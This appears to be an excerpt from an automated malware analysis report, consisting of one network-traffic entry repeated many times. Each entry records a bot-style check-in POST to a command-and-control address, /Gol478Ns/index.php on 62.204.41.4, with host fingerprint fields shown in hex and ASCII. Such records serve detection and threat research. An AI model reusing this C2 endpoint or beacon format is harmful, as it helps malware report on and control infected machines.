                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
